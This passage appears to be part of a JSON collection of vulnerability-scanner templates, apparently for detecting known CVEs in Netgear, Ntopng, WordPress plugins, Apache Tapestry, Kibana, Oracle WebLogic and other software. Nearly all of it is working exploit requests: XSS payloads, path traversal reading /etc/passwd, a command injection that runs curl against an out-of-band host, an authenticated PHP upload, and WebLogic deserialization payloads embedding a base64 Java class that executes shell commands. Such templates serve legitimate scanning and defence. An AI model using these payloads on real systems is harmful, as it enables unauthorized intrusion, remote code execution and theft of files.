Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http_header.php"],"headers":{"X-Trigger-XSS":"<script>alert(1)</script>"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(header), 'x-xss-protection')"]},{"type":"word","part":"body","words":["\"HTTP_X_TRIGGER_XSS\":\"<script>alert(1)</script>\""]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2021-20167","info":{"name":"Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun","severity":"high"},"requests":[{"raw":["POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1\nHost: {{Hostname}}\n\n\"name\":\"';$(curl {{interactsh-url}});'\",\n\"email\":\"a@b.c\"\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-28073","info":{"name":"Ntopng Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css","{{BaseURL}}/lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css"],"matchers-condition":"and","matchers":[{"type":"word","words":["application/json"],"part":"header"},{"type":"word","words":["\"results\":","\"name\":","\"tab\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24155","info":{"name":"WordPress BackupGuard <1.6.0 - Authenticated Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=backup_guard_backups HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: multipart/form-data; boundary=---------------------------204200867127808062083805313921\n\n-----------------------------204200867127808062083805313921\nContent-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php\n\necho \"CVE-2021-24155\";\n\n?>\n\n-----------------------------204200867127808062083805313921--\n","GET /wp-content/uploads/backup-guard/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_3, '{\\\"success\\\":1}')","contains(body_4, 'CVE-2021-24155')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["BG_BACKUP_STRINGS = {\"nonce\":\"([0-9a-zA-Z]+)\"};"],"internal":true}]}]},{"id":"CVE-2021-27850","info":{"name":"Apache Tapestry - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /assets/app/something/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/java"]},{"type":"word","part":"body","words":["configuration","webtools"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\\/assets\\/app\\/([a-z0-9]+)\\/services\\/AppMod"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-34640","info":{"name":"WordPress Securimage-WP-Fixed <=3.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET //wp-admin/options-general.php/\"></script><script>alert(document.domain)</script>/script%3E?page=securimage-wp-options%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3374","info":{"name":"Rstudio Shiny Server <1.5.16 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2f/","{{BaseURL}}/sample-apps/hello/%2f/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /"]},{"type":"regex","part":"body","regex":["[A-Za-z].*\\.R"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41569","info":{"name":"SAS/Internet 9.4 1520 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2001-0537","info":{"name":"Cisco IOS HTTP Configuration - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/level/16/exec/show/config/CR"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["service config","Switch","default-gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13101","info":{"name":"D-Link DIR-600M - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wan.htm HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/PPPoE/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14322","info":{"name":"Pallets Werkzeug <0.15.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/base_import/static/c:/windows/win.ini","{{BaseURL}}/web/static/c:/windows/win.ini","{{BaseURL}}/base/static/c:/windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12461","info":{"name":"WebPort 1.19.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"</script><script>alert(document.domain);</script><script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7543","info":{"name":"KindEditor 4.1.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/kindeditor/php/demo.php","{{BaseURL}}/php/demo.php"],"body":"content1=</script><script>alert(document.domain)</script>&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-14223","info":{"name":"Alfresco Share - Open Redirect","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/share/page/dologin"],"body":"success=%2Fshare%2Fpage%2F&failure=:\\\\interact.sh&username=baduser&password=badpass\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"]}]}]},{"id":"CVE-2019-16313","info":{"name":"ifw8 Router ROM v4.31 - Credential Discovery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/action/usermanager.htm"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<td class=\"pwd\" data=\"([a-z]+)\">\\*\\*\\*\\*\\*\\*<\\/td>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["<td class=\"pwd\" data=\"([a-z]+)\">\\*\\*\\*\\*\\*\\*<\\/td>"],"part":"body"}]}]},{"id":"CVE-2019-18665","info":{"name":"DOMOS 5.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7609","info":{"name":"Kibana Timelion - Arbitrary Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/timelion/run"],"body":"{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}","headers":{"Content-Type":"application/json; charset=utf-8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["seriesList"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7255","info":{"name":"Linear eMerge E3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Template : <script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10475","info":{"name":"Jenkins build-metrics 1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1337)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7254","info":{"name":"eMerge E3 1.00-06 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?c=../../../../../../etc/passwd%00","{{BaseURL}}/badging/badge_print_v0.php?tpl=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2729","info":{"name":"Oracle WebLogic Server Administration Console - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class=\"sun.misc.BASE64Decoder\"><void method=\"decodeBuffer\" id=\"byte_arr\"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\"org.mozilla.classfile.DefiningClassLoader\"><void method=\"defineClass\"><string>ResultBaseExec</string><object idref=\"byte_arr\"></object><void method=\"newInstance\"><void method=\"do_exec\" id=\"result\"><string>echo${IFS}COP-9272-9102-EVC|rev</string></void></void></void></void><void class=\"java.lang.Thread\" method=\"currentThread\"><void method=\"getCurrentWork\" id=\"current_work\"><void method=\"getClass\"><void method=\"getDeclaredField\"><string>connectionHandler</string><void method=\"setAccessible\"><boolean>true</boolean></void><void method=\"get\"><object idref=\"current_work\"></object><void method=\"getServletRequest\"><void method=\"getResponse\"><void method=\"getServletOutputStream\"><void method=\"writeStream\"><object class=\"weblogic.xml.util.StringInputStream\"><object idref=\"result\"></object></object></void><void method=\"flush\"/></void><void method=\"getWriter\"><void method=\"write\"><string></string></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n","POST /_async/AsyncResponseService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><array method=\"forName\"><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class=\"byte\" length=\"3478\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void index=\"93\"><byte>58</byte></void><void index=\"94\"><byte>99</byte></void><void index=\"95\"><byte>111</byte></void><void index=\"96\"><byte>109</byte></void><void index=\"97\"><byte>46</byte></void><void index=\"98\"><byte>115</byte></void><void index=\"99\"><byte>117</byte></void><void index=\"100\"><byte>110</byte></void><void index=\"101\"><byte>46</byte></void><void index=\"102\"><byte>111</byte></void><void index=\"103\"><byte>114</byte></void><void index=\"104\"><byte>103</byte></void><void index=\"105\"><byte>46</byte></void><void index=\"106\"><byte>97</byte></void><void index=\"107\"><byte>112</byte></void><void index=\"108\"><byte>97</byte></void><void index=\"109\"><byte>99</byte></void><void index=\"110\"><byte>104</byte></void><void index=\"111\"><byte>101</byte></void><void index=\"112\"><byte>46</byte></void><void index=\"113\"><byte>120</byte></void><void index=\"114\"><byte>97</byte></void><void index=\"115\"><byte>108</byte></void><void index=\"116\"><byte>97</byte></void><void index=\"117\"><byte>110</byte></void><void index=\"118\"><byte>46</byte></void><void index=\"119\"><byte>105</byte></void><void index=\"120\"><byte>110</byte></void><void index=\"121\"><byte>116</byte></void><void index=\"122\"><byte>101</byte></void><void index=\"123\"><byte>114</byte></void><void index=\"124\"><byte>110</byte></void><void index=\"125\"><byte>97</byte></void><void index=\"126\"><byte>108</byte></void><void index=\"127\"><byte>46</byte></void><void index=\"128\"><byte>120</byte></void><void index=\"129\"><byte>115</byte></void><void index=\"130\"><byte>108</byte></void><void index=\"131\"><byte>116</byte></void><void index=\"132\"><byte>99</byte></void><void index=\"133\"><byte>46</byte></void><void index=\"134\"><byte>116</byte></void><void index=\"135\"><byte>114</byte></void><void index=\"136\"><byte>97</byte></void><void index=\"137\"><byte>120</byte></void><void index=\"138\"><byte>46</byte></void><void index=\"139\"><byte>84</byte></void><void index=\"140\"><byte>101</byte></void><void index=\"141\"><byte>109</byte></void><void index=\"142\"><byte>112</byte></void><void index=\"143\"><byte>108</byte></void><void index=\"144\"><byte>97</byte></void><void index=\"145\"><byte>116</byte></void><void index=\"146\"><byte>101</byte></void><void index=\"147\"><byte>115</byte></void><void index=\"148\"><byte>73</byte></void><void index=\"149\"><byte>109</byte></void><void index=\"150\"><byte>112</byte></void><void index=\"151\"><byte>108</byte></void><void index=\"152\"><byte>9</byte></void><void index=\"153\"><byte>87</byte></void><void index=\"154\"><byte>79</byte></void><void index=\"155\"><byte>-63</byte></void><void index=\"156\"><byte>110</byte></void><void index=\"157\"><byte>-84</byte></void><void index=\"158\"><byte>-85</byte></void><void index=\"159\"><byte>51</byte></void><void index=\"160\"><byte>3</byte></void><void index=\"161\"><byte>0</byte></void><void index=\"162\"><byte>6</byte></void><void index=\"163\"><byte>73</byte></void><void index=\"164\"><byte>0</byte></void><void index=\"165\"><byte>13</byte></void><void index=\"166\"><byte>95</byte></void><void index=\"167\"><byte>105</byte></void><void index=\"168\"><byte>110</byte></void><void index=\"169\"><byte>100</byte></void><void index=\"170\"><byte>101</byte></void><void index=\"171\"><byte>110</byte></void><void index=\"172\"><byte>116</byte></void><void index=\"173\"><byte>78</byte></void><void index=\"174\"><byte>117</byte></void><void index=\"175\"><byte>109</byte></void><void index=\"176\"><byte>98</byte></void><void index=\"177\"><byte>101</byte></void><void index=\"178\"><byte>114</byte></void><void index=\"179\"><byte>73</byte></void><void index=\"180\"><byte>0</byte></void><void index=\"181\"><byte>14</byte></void><void index=\"182\"><byte>95</byte></void><void index=\"183\"><byte>116</byte></void><void index=\"184\"><byte>114</byte></void><void index=\"185\"><byte>97</byte></void><void index=\"186\"><byte>110</byte></void><void index=\"187\"><byte>115</byte></void><void index=\"188\"><byte>108</byte></void><void index=\"189\"><byte>101</byte></void><void index=\"190\"><byte>116</byte></void><void index=\"191\"><byte>73</byte></void><void index=\"192\"><byte>110</byte></void><void index=\"193\"><byte>100</byte></void><void index=\"194\"><byte>101</byte></void><void index=\"195\"><byte>120</byte></void><void index=\"196\"><byte>91</byte></void><void index=\"197\"><byte>0</byte></void><void index=\"198\"><byte>10</byte></void><void index=\"199\"><byte>95</byte></void><void index=\"200\"><byte>98</byte></void><void index=\"201\"><byte>121</byte></void><void index=\"202\"><byte>116</byte></void><void index=\"203\"><byte>101</byte></void><void index=\"204\"><byte>99</byte></void><void index=\"205\"><byte>111</byte></void><void index=\"206\"><byte>100</byte></void><void index=\"207\"><byte>101</byte></void><void index=\"208\"><byte>115</byte></void><void index=\"209\"><byte>116</byte></void><void index=\"210\"><byte>0</byte></void><void index=\"211\"><byte>3</byte></void><void index=\"212\"><byte>91</byte></void><void index=\"213\"><byte>91</byte></void><void index=\"214\"><byte>66</byte></void><void index=\"215\"><byte>91</byte></void><void index=\"216\"><byte>0</byte></void><void index=\"217\"><byte>6</byte></void><void index=\"218\"><byte>95</byte></void><void index=\"219\"><byte>99</byte></void><void index=\"220\"><byte>108</byte></void><void index=\"221\"><byte>97</byte></void><void index=\"222\"><byte>115</byte></void><void index=\"223\"><byte>115</byte></void><void index=\"224\"><byte>116</byte></void><void index=\"225\"><byte>0</byte></void><void index=\"226\"><byte>18</byte></void><void index=\"227\"><byte>91</byte></void><void index=\"228\"><byte>76</byte></void><void index=\"229\"><byte>106</byte></void><void index=\"230\"><byte>97</byte></void><void index=\"231\"><byte>118</byte></void><void index=\"232\"><byte>97</byte></void><void 